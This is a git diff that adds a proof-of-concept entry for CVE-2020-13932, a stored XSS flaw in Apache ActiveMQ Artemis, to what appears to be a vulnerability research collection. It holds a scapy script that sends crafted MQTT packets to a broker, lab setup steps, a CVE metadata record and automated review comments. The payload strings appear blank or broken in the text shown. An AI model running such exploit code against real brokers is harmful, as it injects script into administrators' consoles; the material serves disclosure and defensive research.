diff --git a/cve/apache-activemq/2020/CVE-2020-13932/Effect.png b/cve/apache-activemq/2020/CVE-2020-13932/Effect.png
new file mode 100644
index 0000000000000000000000000000000000000000..c5a75b4931de1b4e3802bcfcc5b423909461346d
Binary files /dev/null and b/cve/apache-activemq/2020/CVE-2020-13932/Effect.png differ
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/Effect2.png b/cve/apache-activemq/2020/CVE-2020-13932/Effect2.png
new file mode 100644
index 0000000000000000000000000000000000000000..c78d26db7b73a8d7b9da9419f509a76345393eeb
Binary files /dev/null and b/cve/apache-activemq/2020/CVE-2020-13932/Effect2.png differ
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/dashboard.png b/cve/apache-activemq/2020/CVE-2020-13932/dashboard.png
new file mode 100644
index 0000000000000000000000000000000000000000..7a928e92fa711e0be5de9a90a5cb62d82dddc4bb
Binary files /dev/null and b/cve/apache-activemq/2020/CVE-2020-13932/dashboard.png differ
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/poc.py b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
new file mode 100644
index 0000000000000000000000000000000000000000..d85d0d517cc1c81cff7b6232220daf4b64373f6c
--- /dev/null
+++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
@@ -0,0 +1,22 @@
+import time
+import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
+
+brokerIP = "" # input the server IP here
+brokerPort = 1883 # The default listen port of MQTT is 1883
+clientid = "" #Malformed Clientid
+malformedTopic = "
" # Malformed Topic
+
+if __name__ == '__main__':
+ connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
+ # Malformed Connect Message
+ subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+ # Malformed Subscribe Message
+ conn = socket.socket()
+ conn.connect((brokerIP, brokerPort))
+ conn.send(raw(connMessage))
+ time.sleep(1)
+ conn.send(raw(subMessage))
+ input() # Keep the MQTT Connection
+ conn.close()
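Review bot: The socket created at `conn = socket.socket()` has no timeout and is closed only on the success path, so an unreachable broker blocks indefinitely and a failed `connect` or `send` leaves the descriptor open. `with socket.create_connection((brokerIP, brokerPort), timeout=10) as conn:` would cover both. The `malformedTopic` literal is shown split across two lines, which is a SyntaxError in Python unless this is a rendering artifact of the page. The wildcard `from scapy.contrib.mqtt import *` should be replaced with `from scapy.contrib.mqtt import MQTT, MQTTConnect, MQTTSubscribe, MQTTTopicQOS` so the names the script depends on are explicit.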
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/readme.md b/cve/apache-activemq/2020/CVE-2020-13932/readme.md
new file mode 100644
index 0000000000000000000000000000000000000000..07ad421bbff47d7ca7a266c15c9fed576ee53cee
--- /dev/null
+++ b/cve/apache-activemq/2020/CVE-2020-13932/readme.md
@@ -0,0 +1,76 @@
+# CVE-2020-13932 Exploit
+**Author: ZodiacLyu**
+## Description
+In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.
+
+## Experimental environment
+### OS Version
+``` bash
+$ cat /etc/os-release
+NAME="Ubuntu"
+VERSION="20.04.3 LTS (Focal Fossa)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 20.04.3 LTS"
+VERSION_ID="20.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=focal
+UBUNTU_CODENAME=focal
+
+$ uname -a
+Linux ubuntu 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+
+```
+### Software
+#### Download ActiveMQ Artemis
+Apache Activemq Artemis Version: 2.12.0
+```bash
+wget https://archive.apache.org/dist/activemq/activemq-artemis/2.12.0/apache-artemis-2.12.0-bin.tar.gz
+tar -zxvf apache-artemis-2.12.0-bin.tar.gz
+```
+#### Run ActiveMQ Artemis
+*Require Java
+```bash
+cd apache-artemis-2.12.0/bin/
+./artemis create [path]
+# Then register an account for visiting the dashboard
+cd [path]/bin/
+./artemis run
+```
+## PoC
+Use the python code below to establish a connection with malformed topic subscription
+```python
+import time
+import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
+
+brokerIP = "" # input the server IP here
+brokerPort = 1883 # The default listen port of MQTT is 1883
+clientid = "" #Malformed Clientid
+malformedTopic = "
" # Malformed Topic
+
+if __name__ == '__main__':
+ connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
+ # Malformed Connect Message
+ subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+ # Malformed Subscribe Message
+ conn = socket.socket()
+ conn.connect((brokerIP, brokerPort))
+ conn.send(raw(connMessage))
+ time.sleep(1)
+ conn.send(raw(subMessage))
+ input() # Keep the MQTT Connection
+ conn.close()
+```
+Keep the PoC program running and visit the dashboard(localhost:8161)
+
+Visit "Management Console" -> "Artemis" -> "Diagram"
+
+The pop-up window indicates that the attack is successful.
+Also, if move the cursor to the node of malformed connection, the pop-up window will appear as well
+
+Such Vulnerability provides an attack surface for XSS.
\ No newline at end of file
diff --git a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..1fa394da1d749c426810537db355ad59ff282b79
--- /dev/null
+++ b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-13932
+source: Original
+info:
+ name: Apache ActiveMQ Artemis Clientid XSS
+ severity: Medium
+ description: |
+ In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.
+ scope-of-influence:
+ Apache ActiveMQ Artemis 2.5.0 to 2.13.0
+ reference:
+ https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
+ https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
+ https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-13932
+ cwe-id: CWE-79
+ cnvd-id: None
+ kve-id: None
+ tags: XSS
\ No newline at end of file
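Review bot: Under `reference:` the same announcement URL appears twice, and the entries are bare continuation lines rather than `- ` list items, so as shown a YAML parser would fold them into one string (indentation may have been lost in rendering). Drop the duplicate and write each entry as a `- https://...` item. `scope-of-influence:` has the same bare-scalar shape. The record states the affected range but no fixed release or mitigation, so adding the fixed version from the linked advisory would make the entry actionable for defenders. The `name` mentions only the client id, while the description also covers the topic name.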
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index fb3646724f90d27fed61ad954624870a4e5e07c8..74e40e541e354bfe7fb2575d757969493ed9df1c 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -6,6 +6,8 @@ cve:
- CVE-2021-42013
apache-APISIX:
- CVE-2022-24112
+ apache-activemq:
+ - CVE-2020-13932
apache-CouchDB:
- CVE-2022-24706
apache-solr: